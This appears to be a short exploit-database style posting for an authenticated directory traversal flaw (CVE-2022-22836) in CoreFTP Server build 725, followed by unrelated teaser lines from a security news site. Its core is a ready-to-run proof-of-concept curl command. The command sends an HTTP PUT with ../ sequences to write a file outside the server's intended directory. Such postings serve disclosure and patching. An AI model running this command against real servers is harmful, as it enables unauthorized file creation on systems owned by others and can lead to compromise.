EXPLOIT
Exploit Title: CoreFTP Server build 725 - Directory Traversal (Authenticated)
Exploit Author: LiamInfosec
Vendor Homepage: http://coreftp.com/
Version: build 725 and below
Tested on: Windows 10
CVE : CVE-2022-22836
# Description:
CoreFTP Server before 727 allows directory traversal (for file creation) by an authenticated attacker via ../ in an HTTP PUT request.
# Proof of Concept:
curl -k -X PUT -H "Host: <IP>" --basic -u <username>:<password> --data-binary "PoC." --path-as-is https://<IP>/../../../../../../whoops
This post was last modified on 11 January 2022 11:06 PM
British high street chain WH Smith has recently revealed that it was hit by a…
As banks worldwide roll out Voice ID as a means of user authentication over the…
In the era of digital transformation, cybersecurity has become a major concern for businesses. When…
In today's digital age, cybersecurity threats have become a significant concern for businesses of all…
The RIG Exploit Kit is currently in the midst of its most productive phase, attempting…
One of the most transformational technologies of our time, artificial intelligence (AI), has quickly come…
Leave a Comment